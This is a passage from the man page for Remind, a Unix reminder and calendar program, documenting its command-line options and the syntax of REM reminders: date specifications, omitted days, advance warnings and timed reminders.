if-then-else for values. May return an error if the first argument is not a boolean. -} ifV_then_else_ : Val → Val → Val → Maybe Val ifV bool b then v else v' = return (if b then v else v') ifV _ then _ else _ = nothing {- The evaluator. We use Scott-brackets (⟦ = \[[, ⟧ = \]]) as it is tradition to mark the borderline between syntax and semantics. Evlauation an expression may return a value of fail. -} ⟦_⟧ : Expr → Maybe Val ⟦ nat n ⟧ = return (nat n) ⟦ bool b ⟧ = return (bool b) ⟦ e +E e' ⟧ = ⟦ e ⟧ >>= λ v → ⟦ e' ⟧ >>= λ v' → v +v v' {- In Haskell we would use "do" syntax: do v <- ⟦ e ⟧ v' <- ⟦ e' ⟧ v +v v' -} ⟦ e ≤E e' ⟧ = ⟦ e ⟧ >>= λ v → ⟦ e' ⟧ >>= λ v' → v ≤v v' ⟦ ifE e then e' else e'' ⟧ = ⟦ e ⟧ >>= λ v → ⟦ e' ⟧ >>= λ v' → ⟦ e'' ⟧ >>= λ v'' → ifV v then v' else v'' {- Evaluation the examples: -} v1 : Maybe Val -- just (nat 5) v1 = ⟦ e1 ⟧ v2 : Maybe Val -- just (bool true) v2 = ⟦ e2 ⟧ v3 : Maybe Val v3 = ⟦ e3 ⟧ -- nothing {- We do everything again but this time for a typed language. -} {- the types -} data Ty : Set where nat : Ty bool : Ty {- typed values -} data TVal : Ty → Set where nat : ℕ → TVal nat bool : Bool → TVal bool {- typed expressions -} data TExpr : Ty → Set where nat : ℕ → TExpr nat bool : Bool → TExpr bool _+E_ : TExpr nat → TExpr nat → TExpr nat _≤E_ : TExpr nat → TExpr nat → TExpr bool ifE_then_else_ : {σ : Ty} → TExpr bool → TExpr σ → TExpr σ → TExpr σ {- the typed evaluator doesn't need to use the Maybe monad because it will never fail. -} ⟦_⟧T : {σ : Ty} → TExpr σ → TVal σ ⟦ nat n ⟧T = nat n ⟦ bool b ⟧T = bool b ⟦ e +E e' ⟧T with ⟦ e ⟧T | ⟦ e' ⟧T ... | nat m | nat n = nat (m + n) ⟦ e ≤E e' ⟧T with ⟦ e ⟧T | ⟦ e' ⟧T ... | nat m | nat n = bool (dec2bool (m ≤? n)) ⟦ ifE e then e' else e'' ⟧T with ⟦ e ⟧T ... | bool b = if b then ⟦ e' ⟧T else ⟦ e'' ⟧T {- But what to do if just have got an untyped expression (maybe read from a file)? We use a type checker to lift an untyped expression to an equivalent typed expression (or fail). -} {- A forgetful map from typed expressions to untyped expressions -} ⌊_⌋ : {σ : Ty} → TExpr σ → Expr ⌊ nat n ⌋ = nat n ⌊ bool b ⌋ = bool b ⌊ e +E e' ⌋ = ⌊ e ⌋ +E ⌊ e' ⌋ ⌊ e ≤E e' ⌋ = ⌊ e ⌋ ≤E ⌊ e' ⌋ ⌊ ifE e then e' else e'' ⌋ = ifE ⌊ e ⌋ then ⌊ e' ⌋ else ⌊ e'' ⌋ {- equality of types is clearly decidable -} _≡Ty?_ : (σ τ : Ty) → Dec (σ ≡ τ) nat ≡Ty? nat = yes refl nat ≡Ty? bool = no (λ ()) bool ≡Ty? nat = no (λ ()) bool ≡Ty? bool = yes refl {- The result of checking an expression e is a record containing: -} record Check (e : Expr) : Set where constructor check field σ : Ty -- a type te : TExpr σ -- a typed expression te≡e : ⌊ te ⌋ ≡ e -- if we forget the types we recover e {- This is the first time we use records in Agda. Look up the reference manual for a decription of records in Agda. -} open Check {- Records also use modules which hide the projection functions. By opening it we have direct access to the projection functions corresponding to the field names. E.g. we have σ : Check e → Ty te : (c : Check e) → TExpr (σ c) -} {- We implement type inference by recursion over the expression. -} infer : (e : Expr) → Maybe (Check e) infer (nat n) = just (check nat (nat n) refl) infer (bool b) = just (check bool (bool b) refl) {- To infer a type for e + e' we recursively infer types for e and e' (which may fail) and make sure that there are nat in which case we return a typed expression of type nat. -} infer (e +E e') with infer e | infer e' infer (.(⌊ te ⌋) +E .(⌊ te' ⌋)) | just (check nat te refl) | just (check nat te' refl) = just (check nat (te +E te') refl) infer (e +E e') | _ | _ = nothing {- ≤ uses the same technique -} infer (e ≤E e') with infer e | infer e' infer (.(⌊ te ⌋) ≤E .(⌊ te' ⌋)) | just (check nat te refl) | just (check nat te' refl) = just (check bool (te ≤E te') refl) infer (e ≤E e') | _ | _ = nothing {- if-then-else also has to make sure that both branches have the same type, which is the type of the result. -} infer (ifE e then e' else e'') with infer e | infer e' | infer e'' infer (ifE .(⌊ te ⌋) then .(⌊ te' ⌋) else .(⌊ te'' ⌋)) | just (check bool te refl) | just (check σ te' refl) | just (check σ' te'' refl) with σ ≡Ty? σ' infer (ifE .(⌊ te ⌋) then .(⌊ te' ⌋) else .(⌊ te'' ⌋)) | just (check bool te refl) | just (check σ te' refl) | just (check .σ te'' refl) | yes refl = just (check σ (ifE te then te' else te'') refl) infer (ifE .(⌊ te ⌋) then .(⌊ te' ⌋) else .(⌊ te'' ⌋)) | just (check bool te refl) | just (check σ te' refl) | just (check σ' te'' refl) | no _ = nothing infer (ifE e then e' else e'') | _ | _ | _ = nothing {- A safe evaluator -} {- We can also forget the types of typed values -} ⌊_⌋v : {σ : Ty} → TVal σ → Val ⌊ nat n ⌋v = nat n ⌊ bool b ⌋v = bool b {- We implement a safe evaluator which has the same type as the untyped evaluator. It exploits the type checker to first produce a typed expression (or fail) and then runs the fast and safe typed evaluator. -} ⟦_⟧s : Expr → Maybe Val ⟦ e ⟧s = infer e >>= λ c → return (⌊ ⟦ Check.te c ⟧T ⌋v) {- For our examples that safe evaluator produces the same results: -} v1' : Maybe Val v1' = ⟦ e1 ⟧s v2' : Maybe Val v2' = ⟦ e2 ⟧s v3' : Maybe Val v3' = ⟦ e3 ⟧s {- Is this always the case ? -} | http://www.cs.nott.ac.uk/~txa/g53cfr/l14.html/l13.html | CC-MAIN-2013-48 | refinedweb | 1,435 | 71.89 |
"No module named lxml.etree" error in controlling GP3
Hi Everyone
I'm trying to control Gaze Point 3 with Pygaze (WinPython-PyGaze-0.6.0) and the latest version of GazePoint Controller on Win10 (64bit).
The problem is...
When I try to run "SlideShow" example, "No module named lxml.etree" error is thrown.
I re-installed lxml and freetype-py to no avail.
Could anyone tell me how to fix this problem?
The full error message is pasted below.
Best regards
Hiro
FreeType import Failed: Freetype library not found
Traceback (most recent call last):
File "experiment.py", line 30, in <module>
tracker = EyeTracker(disp)
File "C:\Users\DoiH\Desktop\WinPython-PyGaze-0.6.0\python-2.7.3\lib\site-packages\pygaze\eyetracker.py", line 118, in __init__
from pygaze._eyetracker.libopengaze import OpenGazeTracker
File "C:\Users\DoiH\Desktop\WinPython-PyGaze-0.6.0\python-2.7.3\lib\site-packages\pygaze\_eyetracker\libopengaze.py", line 41, in <module>
from opengaze import OpenGazeTracker as OpenGaze
File "C:\Users\DoiH\Desktop\WinPython-PyGaze-0.6.0\python-2.7.3\lib\site-packages\pygaze\_eyetracker\opengaze.py", line 14, in <module>
import lxml.etree
ImportError: No module named lxml.etree
0.8818 WARNING Movie2 stim could not be imported and won't be available
1.0676 WARNING TextBox stim could not be imported and won't be available.
1.0677 WARNING TextBox Font Manager Found No Fonts.
1.0680 WARNING Monitor specification not found. Creating a temporary one...
1.0683 WARNING User requested fullscreen with size [1024 768], but screen is actually [1280, 720]. Using actual size
Solved.
Sorry for bothering you all.
Best
Hiro
For future reference, the solution is to install the lxml library by opening a terminal (command prompt) and running the following command:
For more info, see: | https://forum.cogsci.nl/discussion/5107/no-module-named-lxml-etree-error-in-controlling-gp3 | CC-MAIN-2020-45 | refinedweb | 301 | 53.98 |
Using Device-Independent Bitmaps in WinCE Development
Device-Independent Bitmaps
Device-independent bitmaps take their name from the fact that they include color information along with image data. The advantage of this is that they can be dynamically adjusted to paint properly on any display device, with the disadvantage that the color information takes up space and significantly complicates the process of reading a file and rendering the bitmap. For this reason, if you use DIBs, you use different APIs to access them. On CE devices, unlike on the desktop, we use the function SHLoadDIBitmap() to get a handle to the DIB. After that, the steps required to manipulate and display the image are more or less the same ones you would use with a device-dependent bitmap. The example application PasteDIB shows these steps, but because it's much like the bitmap code you've already seen, we'll just highlight the differences here. (The sources and support files are included in their entirety on the accompanying CD.)
First, for many CE platforms, you'll need a special header file, shellapi.h:
#include <shellapi.h>
Next, we load the bitmap file by name in response to the WM_PAINT message:
case WM_PAINT: RECT rt; hdc = BeginPaint(hWnd, &ps); GetClientRect(hWnd, &rt); //use a null-terminated Unicode string for the file name hbmpDIB = SHLoadDIBitmap( TEXT("\\Windows\\Clouds.dib")); //now, use the returned bitmap handle in the typical ways hdcMemory = CreateCompatibleDC( hdc ); SelectObject( hdcMemory, hbmpDIB ); GetObject( hbmpDIB, sizeof(BITMAP), &bmp ); BitBlt(hdc, 0, (GetSystemMetrics(SM_CYSCREEN ) / 8 ), bmp.bmWidth, bmp.bmHeight, hdcMemory, 0, 0, SRCCOPY ); EndPaint(hWnd, &ps); break;
Notice two things about this code fragment. First, we use the TEXT() macro to format a literal string for the file name. Under CE, all filenames and user interface text strings are Unicode. SHLoadDIBitmap() will fail if the filename string is not Unicode. Also, notice that we have specified a fully qualified pathname, \Windows\Clouds.dib, for the DIB file. When you copy files, a CE device to try DIBPaste; you'll need make sure that Clouds.dib ends up there. Finally, notice that once we retrieve a handle to the bitmap data contained in the DIB file, we can treat it in the same way as we'd treat any other bitmap.
Looking Ahead
Perhaps the most noticeable differences in the graphics programming you'll undertake for CE hinge on the fact that users rely heavily or even exclusively on the "touchable screen" metaphor implemented in the stylus. In some cases, programming for stylus "taps" isn't awfully different than programming for mouse clicks. When it comes to the stylus as a text input device, however, things definitely begin to become a bit more complex.
In the next series of examples, we'll explore handling the stylus and the ink control. In the process, we'll look into what you can do to make your Win32 applications stylus capable as quickly and effectively as possible.<< | https://www.developer.com/ws/pc/article.php/10947_2174651_2/Using-Device-Independent-Bitmaps-in-WinCE-Development.htm | CC-MAIN-2019-09 | refinedweb | 492 | 52.8 |
Hello,
I am new to this. Hope I won't break any etiquette unknowingly. I DID my homework, I believe ...
I'd like to get C/C++ code which allows me to get the path of the active application, ideally in the format of char. I wrote a program for which I want to retrieve info from a txt file (specific parameters) and also to save data in a txt file. Since I would like to use this program on a variety of Macs, I'd like it to be able to automatically retrieve the path so no matter what it'll find the parameter.txt file and the savedata.txt file.
I am using Macintosh computers with OS X (10.4.8), Metrowerk's CodeWarrior C/C++, and Carbon platform (until I learn cocoa).
Here's sample code I had hoped would do the job but it doesn't because I don't know what an "environment variable" is (i.e. how to define one, how to use it). Maybe to use getenv is totally wrong?
#include <stdio.h> #include <stdlib.h> int main () { char *value; char *var; if( (value = getenv(var)) == NULL) { printf("%s is not an environmental variable", var);} else { printf("%s = %s \n", var, value);} // I hoped that var would contain the path. return 0; }
Thanks for your patience and any help you might be able to offer!
BP
Edited 3 Years Ago by happygeek: fixed formatting | https://www.daniweb.com/programming/software-development/threads/71346/how-to-get-path-of-current-appl-in-char-for-mac-os-x | CC-MAIN-2016-50 | refinedweb | 241 | 74.39 |
In my previous posts, I introduced you to Node.js and walked through a bit of its codebase. Now I want to get a simple, but non-trivial Node.js application running. My biggest problem with Node.js so far has been the lack of substantial examples: if I see one more Hello World or Echo Server, I’ll flip my lid (side note: I found the same thing for Ruby’s EventMachine so I created my evented repo). By far the best resource I’ve found for learning Node.js has been DailyJS, highly recommended!
So I’ve spent the last few weeks building Chrono.js, an application metrics server. Chrono is still under development so it’s really not appropriate for general usage but it makes for a decent example app.
Here’s a basic request which fetches data from MongoDB and renders it via jqtpl:
app.get('/', function(req, res) { db.open(function(err, ignored) { if (err) console.log(err); db.collectionNames(function(err, names) { if (err) console.log(err); db.close(); pro = _(names).chain() .pluck('name') .map(function(x) { return x.substr(x.indexOf('.') + 1); }) .reject(function(x) { return (x.indexOf('system.') == 0); }) .value(); res.render('index.html.jqtpl', { locals: { metrics: pro } }); }); }); });
We are scanning MongoDB for the set of metric collections and displaying them in the selector so the user can switch between them. See the main source file for more examples about parameter handling, headers, JSON, etc.
You will need MongoDB installed and running locally. You should already have Node.js and npm installed from Part I. Let’s install the javascript libraries required and Chrono itself:
npm install express expresso jqtpl mongodb underscore tobi git clone git://github.com/mperham/chrono.js.git
Express is a lightweight application server, similar to Sinatra. jqtpl is jQuery Templates, which allows us to dynamically render HTML. mongodb is the MongoDB client driver for Node.js. expresso is a TDD framework and tobi is an HTTP functional testing package. Finally, underscore is a great little utility library which provides JavaScript with a much more sane functional programming API.
You can run the tests:
expresso
or run the Chrono.js server:
node chrono.js
Click to load in some fake data and visit (select ‘registrations’) to see the results, graphed in living color for you!
Expresso gives us a simple DSL for testing our endpoints but I found it to be lacking basic setup/teardown functionality which I had to roll myself in order to insert some test data. I would have preferred to use vows.js but it appears to be incompatible with tobi. Check out the Chrono.js test suite for what I came up with, here’s a small sample:
exports['POST /metrics'] = function() { assert.response(app, { url: '/metrics', method: 'POST', headers: { 'content-type': 'application/json' }, data: JSON.stringify({ k: 'registrations', v: 4, at: parseInt(Number(new Date())/1000) }) }, { status: 201, headers: { 'Content-Type': 'text/html; charset=utf8' }, body: '' } ); }
With expresso, we export the set of functions to run from our test module. Expresso runs them all in parallel and collects the results. The parallelism means that you must be careful with any test data you create. Since MongoDB doesn’t support transactions, we can’t use transactions to isolate each of our tests (e.g. see Rails’s transactional fixtures) so you need to be careful about the data created or deleted by each test and how you assert the current state.
While I’ve gotten much better in the last week, I’ll admit I’m still uncomfortable with Node.js. Its asynchronous semantics mean that your code runs as part of a chain of callbacks; knowing when, where and how that chain works is still difficult for me to understand. Frequently you’ll just get a black screen and a process that won’t exit or an error message that may or may not be related to the actual bug.
That said, I still remember being very frustrated with Ruby, its frequent use of “magic” and poor documentation (e.g. navigating this still befuddles me). I overcame those issues to be very comfortable with Ruby in general; I hope more time with Node.js will give me the same relief.
Interested in a Career at Carbon Five? Check out our job openings. | https://blog.carbonfive.com/node-js-part-iii-full-stack-application/ | CC-MAIN-2021-25 | refinedweb | 721 | 58.99 |
Recently I was working closely with analyzing different vectorization cases. So I decided to write a series of articles dedicated to this topic.
This is the first post in this series, so let me start with some introduction info. Vectorization is a form of SIMD which allows to crunch multiple values in one CPU instruction.
I know it is bad introduction when just links to wiki thrown everywhere around, so let me show you simple example (godbolt):
#include <vector> void foo( std::vector<unsigned>& lhs, std::vector<unsigned>& rhs ) { for( unsigned i = 0; i < lhs.size(); i++ ) { lhs[i] = ( rhs[i] + 1 ) >> 1; } }
Lets compile it with clang with options
-O2 -march=core-avx2 -std=c++14 -fno-unroll-loops. I turned off loop unrolling to simplify the assembly and -march=core-avx2 tells compiler that generated code will be executed on a machine with avx2 support. Assembly generated contains:
Scalar version>
Vector version>
So here you can see that vector version crunches 8 integers at a time (256 bits = 8 bytes). If you will analyze assembly carefull enough you will spot the runtime check which dispatch to those two versions. If there are not enough elements in the vector for choosing vector version, scalar version will be taken. Amount of instructions is smaller in vector version, although all vector instructions have bigger latency than scalar counterparts.
Vector operations can give significant performance gains but they have quite many restrictions which we will cover later. Historically, Intel has 3 instruction sets for vectorization: MMX, SSE and AVX.
Vector registers for those instruction sets are described here.
In general, not only loops can be vectorized. There is also linear vectorizer (in llvm it is called SLP vectorizer) which is searching for similar independent scalar instructions and tries to combine them.
To check vector capabilities of your CPU you can type
lscpu. For my Intel Core i5-7300U filtered output pni pclmulqdq
For us the most interesting is that this CPU supports
sse4_2 and
avx instruction sets.
That’s all for now. In later articles I’m planing to cover following topics: | https://dendibakh.github.io/blog/2017/10/24/Vectorization_part1 | CC-MAIN-2018-34 | refinedweb | 350 | 54.63 |
remind man page
remind — a sophisticated reminder service
Synopsis
remind [options] filename [date] [*rep] [time]
Description
Remind reads the supplied filename and executes the commands found in it. The commands are used to issue reminders and alarms. Each reminder or alarm can consist of a message sent to standard output, or a program to be executed.
If filename is specified as a single dash '-', then Remind takes its input from standard input. This also implicitly enables the -o option, described below.
If filename happens to be a directory rather than a plain file, then Remind reads all of the files in that directory that match the pattern "*.rem". The files are read in sorted order; the sort order may depend on your locale, but should match the sort order used by the shell to expand "*.rem".
Remind reads its files starting from the beginning to the end, or until it encounters a line whose sole content is "__EOF__" (without the quotes.) Anything after the __EOF__ marker is completely ignored. option causes Remind to produce a calendar that is sent to standard output. If you supply a number n, then a calendar will be generated for n months, starting with the current month. By default, a calendar for only the current month is produced.
You can precede n (if any) with a set of flags. The flags are as follows:
- '+'. The approximation is (of necessity) very coarse, because the VT100 only has eight different color sequences, each with one of two brightnesses. A color component greater than 64 is considered "on", and if any of the three color components is greater than 128, the color is considered "bright".
- -wcol[,pad[,spc]]]
The -w option specifies the output width, padding and spacing of the formatted calendar output. Col specifies the number of columns in the output device, and defaults to 80. Pad specifies how many lines to use to "pad" empty calendar boxes. This defaults to 5. If you have many reminders on certain days that make your calendar too large to fit on a page, you can try reducing pad to make the empty boxes smaller. Spc specifies how many blank lines to leave between the day number and the first reminder entry. It defaults to 1.
Any of col, pad or spc can be omitted, providing you provide the correct number of commas. Don't use any spaces in the option.
- trigger on the current day. It also causes Remind not to place timed reminders in a calendar. If you supply two or more -a options, then Remind will trigger timed reminders that are in the future, but will not trigger timed reminders whose time has passed. (Regardless of how many -a options you supply, Remind will not include timed reminders in the calendar if at least one -a option is used.)
- 1, and can range from 1unc(args)=definition
Allows you to define a function on the command line.
If you supply a date on the command line, it must consist of day month year, where day is the day of the month, month is at least the first three letters of the English name of the month, and year is a year (all 4 digits) from 1990 to about 2075. You can leave out the day, which then defaults to 1.
If you do supply a date on the command line, then Remind uses it, rather than the actual system date, as its notion of "today." This lets you create calendars for future months, or test to see how your reminders will be triggered in the future. Similarly, you can supply a time (in 24-hour format -- for example, 17:15) to set Remind's notion of "now" to a particular time. Supplying a time on the command line also implicitly enables the -q option and disables the -z option.
If you would rather specify the date more succinctly, you can supply it as YYYY-MM-DD or YYYY/MM/DD. You can even supply a date and time on the command line as one argument: YYYY-MM-DD@HH:MM.
In addition, you can supply a repeat parameter, which has the form \ sat sun BEFORE MSG [ord(thisyear-1980)] payment due %b!
A reminder file consists of commands, with one command per line. Several lines can be continued using the backslash character, as in the above example. In this case, all of the concatenated lines are treated as a single line by Remind. Note that if an error occurs, Remind reports the line number of the last line of a continued line.
Remind ignores blank lines, and lines beginning with the '#' or ';' characters. You can use the semicolon as a comment character if you wish to pass a Remind script through the C pre-processor, which interprets the '#' character as the start of a pre-processing directive.
Note that Remind processes line continuations before anything else. For example:
#
The most powerful command in a Remind script is the REM command. This command is responsible for issuing reminders. Its syntax is:
REM [ONCE] [date_spec] [back] [delta] [repeat] [PRIORITY prio] [SKIP | BEFORE | AFTER] [OMIT omit_list] [OMITFUNC omit_function] [AT time [tdelta] [trepeat]] [SCHED sched_function] [WARN warn_function] [UNTIL expiry_date | THROUGH last_date] [SCANFROM scan_date | FROM start_date] [DURATION duration] [TAG tag] <MSG | MSF | RUN | CAL | SATISFY | SPECIAL special | PS | PSFILE> body
The parts of the REM command can be specified in any order, except that the body must come immediately after the MSG, RUN, CAL, PS, PSFILE or SATISFY keyword.
The REM token is optional, providing that the remainder of the command cannot be mistaken for another Remind command such as OMIT or RUN. The portion of the REM command before the MSG, MSF RUN, CAL or SATISFY clause is called a trigger.
MSG, MSF, RUN, CAL, SPECIAL, PS and PSFILE
These keywords denote the type of the reminder. (SATISFY is more complicated and will be explained later.) A MSG-type reminder normally prints a message to the standard output, after passing the body through a special substitution filter, described in the section "The Substitution Filter." However, if you have used the -k command-line option, then MSG-type reminders are passed to the appropriate program. Note that the options -c, -s, -p and -n disable the -k option.
Note that you can omit the reminder type, in which case it defaults to MSG. So you can write:
6 January Dianne's Birthday
although this is not recommended.
The MSF keyword is almost the same as the MSG keyword, except that the reminder is formatted to fit into a paragraph-like format. Three system variables control the formatting of MSF-type reminders - they are $FirstIndent, $SubsIndent and $FormWidth. They are discussed in the section "System Variables." The MSF keyword causes the spacing of your reminder to be altered - extra spaces are discarded, and two spaces are placed after periods and other characters, as specified by the system variables $EndSent and $EndSentIg. Note that if the body of the reminder includes newline characters (placed there with the %_ sequence), then the newlines are treated as the beginnings of new paragraphs, and the $FirstIndent indentation is used for the next line. You can use two consecutive newlines to have spaced paragraphs emitted from a single reminder body.
A RUN-type reminder also passes the body through the substitution filter, but then executes the result as a system command. A CAL-type reminder is used only to place entries in the calendar produced when Remind is run with the -c, -s or -p options.
A PS or PSFILE-type reminder is used to pass PostScript code directly to the printer when producing PostScript calendars. This can be used to shade certain calendar entries (see the psshade() function), include graphics in the calendar, or almost any other purpose you can think of. You should not use these types of reminders unless you are an expert PostScript programmer. The PS and PSFILE reminders are ignored unless Remind is run with the -p option. See the section "More about PostScript" for more details.
A SPECIAL-type reminder is used to pass "out-of-band" information from Remind to a calendar-producing back-end. It should be followed by a word indicating the type of special data being passed. The type of a special reminder depends on the back-end. For the Rem2PS back-end, SPECIAL PostScript is equivalent to a PS-type reminder, and SPECIAL PSFile is equivalent to a PSFILE-type reminder. The body of a SPECIAL reminder is obviously dependent upon the back-end.
DATE SPECIFICATIONS
A date_spec consists of zero to four parts. These parts are day (day of month), month (month name), year and weekday. Month and weekday are the English names of months and weekdays. At least the first three characters must be used. The following are examples of the various parts of a date_spec:
- day:
1, 22, 31, 14, 3
- month:
JANUARY, feb, March, ApR, may, Aug
- year:
1990, 1993, 2030, 95 (interpreted as 1995). The year can range from 1990 to 2075.
- weekday:
Monday, tue, Wed, THU, Friday, saturday, sundAy
Note that there can be several weekday components separated by spaces in a date_spec.
INTERPRETATION OF DATE SPECIFICATIONS
The following examples show how date specifications are interpreted.
1. Null date specification - the reminder is triggered every day. The trigger date for a specific run is simply the current system date.
2. Only day present. The reminder is triggered on the specified day of each month. The trigger date for a particular run is the closest such day to the current system date. For example:
REM 1 MSG First of every month..
Note that when both weekday and day are specified, Remind chooses the first date on or after the specified day that also satisfies the weekday constraint. It does this by picking the first date on or after the specified day that is listed in the list of weekdays. Thus, a reminder like:
REM Mon Tue 28 Oct 1990 MSG Hi
would be issued only on Monday, 29 October, 1990. It would not be issued on Tuesday, 30 October, 1990, since the 29th is the first date to satisfy the weekday constraints.
SHORT-HAND DATE SPECIFICATIONS
In addition to spelling out the day, month and year separately, you can specify YYYY-MM-DD or YYYY/MM/DD. For example, the following statements are equivalent:
In the second statement, the "+60" is a delta that applies to the date rather than a tdelta that applies to the time. We recommend explicitly using the AT keyword with timed reminders.
THE REMIND ALGORITHM
Remind uses the following algorithm to compute a trigger date: Starting from the current date, it examines each day, one at a time, until it finds a date that satisfies the date specification, or proves to itself that no such date exists. (Actually, Remind merely behaves as if it used this algorithm; it would be much too slow in practice. Internally, Remind uses much faster techniques to calculate a trigger date.) See DETAILS ABOUT TRIGGER COMPUTATION for more information.
BACKWARD SCANNING
Sometimes, it is necessary to specify a date as being a set amount of time before another date. For example, the last Monday in a given month is computed as the first Monday in the next month, minus 7 days. The back specification in the reminder is used in this case:
REM Mon 1 -7 MSG Last Monday of every month.
A back is specified with one or two dashes followed by an integer. This causes Remind to move "backwards" from what would normally be the trigger date. The difference between --7 and -7 will be explained when the OMIT keyword is described.
ADVANCE WARNING
For some reminders, it is appropriate to receive advance warning of the event. For example, you may wish to be reminded of someone's birthday several days in advance. The delta portion of the REM command achieves this. It is specified as one or two "+" signs followed by a number n. Again, the difference between the "+" and "++" forms will be explained under the OMIT keyword. Remind will trigger the reminder on computed trigger date, as well as on each of the n days before the event. Here are some examples:
REM 6 Jan +5 MSG Remind me of birthday 5 days in advance.
The above example would be triggered every 6th of January, as well as the 1st through 5th of January.
PERIODIC REMINDERS
We have already seen some built-in mechanisms for certain types of periodic reminders. For example, an event occurring every Wednesday could be specified as:
REM Wed MSG Event!
However, events that do not repeat daily, weekly, monthly or yearly require another approach. The repeat component of the REM command fills this need. To use it, you must completely specify a date (year, month and day, and optionally weekday.) The repeat component is an asterisk followed by a number specifying the repetition period in days.
For example, suppose you get paid every second Wednesday, and your last payday was Wednesday, 28 October, 1992. You can use:
REM 28 Oct 1992 *14 MSG Payday
This issues the reminder every 14 days, starting from the calculated trigger date. You can use delta and back with repeat. Note, however, that the back is used only to compute the initial trigger date; thereafter, the reminder repeats with the specified period. Similarly, if you specify a weekday, it is used only to calculate the initial date, and does not affect the repetition period.
SCANFROM and FROM
The SCANFROM and FROM keywords are for advanced Remind programmers only, and will be explained in the section "Details about Trigger Computation" near the end of this manual. Note that SCANFROM is available only in versions of Remind from 03.00.04 up. FROM is available only from 03.01.00 and later.
PRIORITY
The PRIORITY keyword must be followed by a number from 0 to 9999. It is used in calendar mode and when sorting reminders. If two reminders have the same trigger date and time, then they are sorted by priority. If the PRIORITY keyword is not supplied, a default priority of 5000 is used. (This default can be changed by adjusting the system variable $DefaultPrio. See the section "System Variables" for more information.)
EXPIRY DATES
Some reminders should be issued periodically for a certain time, but then expire. For example, suppose you have a class every Friday, and that your last class is on 11 December 1992. You can use:
(Here, do_backup is assumed to be a program or shell script that does the work.) If you run Remind from your .login script, for example, and log in several times per day, the do_backup program will be run each time you log in. If, however, you use the ONCE keyword in the reminder, the Remind checks the last access date of the reminder script. If it is the same as the current date, Remind assumes that it has already been run, and will not issue reminders containing the ONCE keyword.
Note that if you view or edit your reminder script, the last access date will be updated, and the ONCE keyword will not operate properly. If you start Remind with the -o option, then the ONCE keyword will be ignored.
LOCALLY OMITTING WEEKDAYS
The OMIT portion of the REM command is used to "omit" certain days when counting the delta or back. It is specified using the keyword OMIT followed by a list of weekdays. Its action is best illustrated with examples:
REM 1 +1 OMIT Sat Sun MSG Important Event
This reminder is normally triggered on the first of every month, as well as the day preceding it. However, if the first of the month falls on a Sunday or Monday, then the reminder is triggered starting from the previous Friday. This is because the delta of +1 does not count Saturday or Sunday when it counts backwards from the trigger date to determine how much advance warning to give.
Contrast this with the use of "++1" in the above command. In this case, the reminder is triggered on the first of each month, as well as the day preceding it. The omitted days are counted.
REM 1 -1 OMIT Sat Sun MSG Last working day of month
Again, in the above example, the back of -1 normally causes the trigger date to be the last day of the month. However, because of the OMIT clause, if the first of the month falls on a Sunday or Monday, the trigger date is moved backwards past the weekend to Friday. (If you have globally omitted holidays, the reminder will be moved back past them, also. See "The OMIT command" for more details.)
By comparison, if we had used "--1", the reminder would be triggered on the last day of the month, regardless of the OMIT.
COMPUTED LOCAL OMITS
The OMITFUNC phrase of the REM command allows you to supply a function that determines whether or not a date is omitted. The function is passed a single parameter of type DATE, and must return a non-zero integer if the date is considered "omitted" and 0 otherwise. Here's an example:
FSET _third(x) (day(x) % 3) || \ (wkdaynum(x) == 0) || \ (wkdaynum(x) == 6) REM OMITFUNC _third AFTER MSG Working day divisible by 3
In the example above, the reminder is triggered every Monday to Friday whose day-of-month number is divisible by three. Here's how it works:
-.
- The AFTER keyword causes the reminder to be moved after a block of omitted days.
The combination of OMITFUNC and AFTER keyword causes the reminder to be issued on all days whose day-of-month number is divisible by three, but not on Saturday or Sunday.
Note that if you use OMITFUNC, then a local OMIT is ignored as are all global OMITs. If you want to omit specific weekdays, your omit function will need to test for them specifically. If you want to take into account the global OMIT context, then your omit function will need to test for that explicitly (using the isomitted() function.)
Note that an incorrect OMITFUNC might cause all days to be considered omitted. For that reason, when Remind searches through omitted days, it terminates the search after the SATISFY iteration limit (command-line option -x.)
TIMED REMINDERS
Timed reminders are those that have an AT keyword followed by a time and optional tdelta and trepeat. The time must be specified in 24-hour format, with 0:00 representing midnight, 12:00 representing noon, and 23:59 representing one minute to midnight. You can use either a colon or a period to separate the hours from the minutes. That is, 13:39 and 13.39 are equivalent.
Remind treats timed reminders specially. If the trigger date for a timed reminder is the same as the current system date, the reminder is queued for later activation. When Remind has finished processing the reminder file, it puts itself in the background, and activates timed reminders when the system time reached the specified time.
If the trigger date is not the same as the system date, the reminder is not queued.
For example, the following reminder, triggered every working day, will emit a message telling you to leave at 5:00pm:
REM Mon Tue Wed Thu Fri AT 17:00 MSG Time to leave!
The following reminder will be triggered on Thursdays and Fridays, but will only be queued on Fridays:
REM Fri ++1 AT 13:00 MSG Lunch at 1pm Friday.
The tdelta and trepeat have the same form as a repeat and delta, but are specified in minutes. For example, this reminder will be triggered at 12:00pm as well as 45 minutes before:
REM AT 12:00 +45 MSG Example
The following will be issued starting at 10:45, every half hour until 11:45, and again at noon.
REM AT 12:00 +75 *30 MSG Example2
The "+75" means that the reminder is issued starting 75 minutes before noon; in other words, at 10:45. The *30 specifies that the reminder is subsequently to be issued every 30 minutes. Note that the reminder is always issued at the specified time, even if the tdelta is not a multiple of the trepeat. So the above example is issued at 10:45am, 11:15am, 11:45am, and 12:00pm. Note that in the time specification, there is no distinction between the "+" and "++" forms of tdelta.
Normally, Remind will issue timed reminders as it processes the reminder script, as well as queuing them for later. If you do not want Remind to issue the reminders when processing the script, but only to queue them for later, use the myreminders &
This ensures that when you exit X-Windows, the Remind process is killed.
WARNING ABOUT TIMED REMINDERS
Note: If you use user-defined functions or variables (described later) in the bodies of timed reminders, then when the timed reminders are activated, the variables and functions have the definitions that were in effect at the end of the reminder script. These definitions may not necessarily be those that were in effect at the time the reminder was queued.
THE SCHED AND WARN KEYWORDS
The SCHED keyword allows more precise control over the triggering of timed reminders, and the WARN keyword allows precise control over the advance triggering of all types of reminders. However, discussion must be deferred until after expressions and user-defined functions are explained. See the subsection "Precise Scheduling" further on.
TAG AND DURATION
The TAG keyword lets you "tag" certain reminders. This facility is used by certain back-ends or systems built around Remind, such as TkRemind. These back-ends have specific rules about tags; see their documentation for details.
The TAG keyword is followed by a tag consisting of up to 48 characters. You can have as many TAG clauses as you like in a given REM statement.
If you supply the -y option to Remind, then any reminder that lacks a TAG will have one synthesized. The synthesized tag consists of the characters "__syn__" followed by the hexadecimal representation of the MD5 sum of the REM command line. This lets you give a more-or-less unique identifier to each distinct REM command.
The DURATION keyword makes sense only for timed reminders; it specifies the duration of an event."
For example, consider the reminder:
